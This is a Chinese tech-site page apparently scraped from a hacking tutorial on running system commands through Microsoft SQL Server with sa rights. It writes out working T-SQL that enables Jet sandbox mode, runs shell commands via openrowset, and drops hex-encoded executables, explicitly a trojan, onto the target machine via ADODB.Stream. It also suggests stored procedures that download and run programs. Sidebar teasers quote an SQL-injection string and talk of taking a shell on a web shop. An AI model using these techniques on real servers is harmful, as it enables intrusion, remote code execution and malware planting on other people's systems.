两种Microsoft SQL Server执行命令的方法都需要以sa权限为前提
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限,所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程。两种Microsoft SQL Server执行命令的方法都需要以sa权限为前提。
1, 沙盒模式的变通.
原始方法:
第一句开启沙盘模式:exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
复制代码第二句利用jet.oledb执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("CMD命令")’)
复制代码但是,当 X:\Windows\System32\ias\dnary.mdb 或 X:\Windows\System32\ias\ias.mdb 被删除时,命令就会无效了.
所以利用以下语句创建一个数据库:(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用.)
复制代码
代码如下:
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate ’ADOX.Catalog’,@object OUTPUT
exec @hr = sp_OAMethod @object,’Create’,@property output,’Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml’
然后再利用jet.oledb调用SysSetup.xml执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=SysSetup.xml’,’select shell("CMD命令")’)
2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此方法不支持文件大于64KB)
当已经有一个程序需要放到对方计算机的时候.(例如, 放MA。)
将这个文件转成HEX代码。
如果不知道怎么把文件转成HEX代码,请使用下面的工具.
File2Hex.rar (424 Bytes)
使用方法很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含HEX代码的文本.
然后用以下方法写入到对方计算机中。
复制代码
代码如下:
DECLARE @ObjectToken INT
EXEC sp_OACreate ’ADODB.Stream’, @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, ’Type’, 1
EXEC sp_OAMethod @ObjectToken, ’Open’
EXEC sp_OAMethod @ObjectToken, ’Write’, NULL, 0x123456(其中0x123456为HEX内容)
EXEC sp_OAMethod @ObjectToken, ’SaveToFile’, NULL, ’Test.exe(文件名)’, 2
EXEC sp_OAMethod @ObjectToken, ’Close’
EXEC sp_OADestroy @ObjectToken
写入之后, 就发挥你的办法去执行你写入的这个文件就OK了。
集思广益:
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限..
所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程.
至于存储过程的功能. 可以是下载程序并执行, 可以是直接执行命令. 当然这个看你自己了.
mysql数据库注射产生的原因 怎么利用mysql漏洞?
鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教 本文需要有基础的SQL语句知识才可以更好的理解 建议想学习的人多去了解一下SQL语句和编程语言,知己知彼才能百战百胜 我不希翼得
详情2018-01-14 10:34:53责编:llp 来源:驱动管家asp.net开发网站怎么进行安全检测?
今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是 net的程序,这样的网站会不会有什么漏洞呢?顺便打开一条消息 http: www cnwill com NewsShow aspx?id=4847 ,然后加一个& 39;
详情2018-01-19 16:31:52责编:llp 来源:驱动管家怎么拿到网上商店系统ecshopx的后台权限?
ECSHOP前段时间出了个注射漏洞:http: bbs wolvez org topic 67 ,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls Net上发帖问如何拿shell,无聊中我baidu、google了下,网上貌似没
详情2018-01-20 11:06:51责编:llp 来源:驱动管家asp.net教程:cookies数据可以用asp.net加密
Cookie确实在WEB应用方面为访问者和编程者都提供了方便,然而从安全方面考虑是有问题的,首先,Cookie数据包含在HTTP请求和响应的包头里透明地传递,也就是说聪明的人是能清清楚楚看到这些数据的。其次,Cookie数
详情2018-01-19 11:29:57责编:llp 来源:驱动管家虚拟主机怎么被黑客入侵?黑客入侵虚拟主机的步骤
问题文件出在admin user asp 提交 http: www xxx com down admin user asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1 就相当于: select * from UserInfo where user=’
详情2018-01-10 13:56:33责编:llp 来源:驱动管家wapiti是什么?轻量级wapiti能检测出哪些漏洞?
Wapiti是Web应用程序漏洞错误检查工具。它具有“暗箱操作”扫描,即它不关心Web应用程序的源代码,但它会扫描网页的部署,寻找使其能够注入数据的脚本和格式。它用于检测网页,看脚本是否脆弱的。Wapiti是一个开
详情2018-01-23 09:55:08责编:llp 来源:驱动管家织梦教程:修复dedecms v5.5跨站漏洞的方法
影响版本:dedecmsCMS V5 5截止2010-03-18 17:50之前下载的所有版本,包含GBK和UTF-8版本漏洞描述:北洋贱队(http: bbs seceye org)首发demo1:http: www dedecms com plus search php?keyword=%22%3E%3Cifr
详情2018-01-17 12:20:47责编:llp 来源:驱动管家upx脱壳的方法 破解upx程序的过程
入门级的破解,用ollydbg我用UPX将NOTEPAD EXE加壳,选择OllyDbg 1 09d来脱壳。首先加载被加壳的程序,程序直接定位到01014110 $60 PUSHAD处,选择CTRL F 输入查找内容 "POPAD ",OD定位到0101425E> 61 POPA
详情2018-01-18 16:05:36责编:llp 来源:驱动管家如何防止网站成为黑网站呢?要做这些事
1 设置严密权限上传目录只给写入、读取权限绝对不能给执行权限每个网站WebSite使用独立用户名和密码权限设置为Guest命令: net localgroup users myweb del设置MSSQL、Apache、MySQL以Guest权限运行:在运
详情2018-01-19 11:29:50责编:llp 来源:驱动管家物联网是什么?物联网时代该怎么保护你的隐私?
什么是物联网,我百度了好多地方,觉得答案实在太官方了。我觉得物联网就是把身边的一切连在一起,包括你曾经认为和网搭不上边的东西,沙发、电视、电饭煲,这一切都被网络连在一起。以后恐怕连战争,都是黑客之
详情2018-01-11 19:49:18责编:llp 来源:驱动管家
- 要防止ddos网络攻击,就要了解ddos网络攻击的七种武器
- 狸窝全能视频转换器保存文件路径可以修改为默认吗?
- 游戏优化大师通常可以优化哪些游戏?游戏优化大师好用吗?
- 笔记本开启360免费wifi的时候提示你的无线网卡没有开启怎么处理?
- 笔记本电脑的硬件检测你知道还能这样操作吗
- dxf文件怎么打开?以下方法教你直接打开dxf文件
- 用这个方法给你的右键菜单设置设置背景吧
- iphone6电信版不锁网,实现三网通用?!
- 小米1s手机关闭应用有这些步骤 小米1s手机关闭应用的方法
- 文件删除不了怎么办?怎样彻底删除电脑顽固文件?
- 桌面图标太大了怎么变小?怎么把桌面图标变小?
- 文件加密器可以快速加密文件 文件加密器怎么使用?
- 路由器怎么设置才可以防止arp攻击?这里有防止arp攻击教程
- 烧饼修改器为什么打不开?烧饼修改器打不开怎么解决?
- 随手记电脑版怎么使用?随手记电脑版怎么记账的?
- 新买的wifi路由器怎么设置?手机连接wifi的方法
- 怎么在笔记本设置wifi热点?笔记本设置wifi热点的方法
- 电脑c盘空间小高手教你扩大c盘空间
- 批处理文件是怎么自动获取管理员权限的?
- 小米1s青春版怎么获取root权限?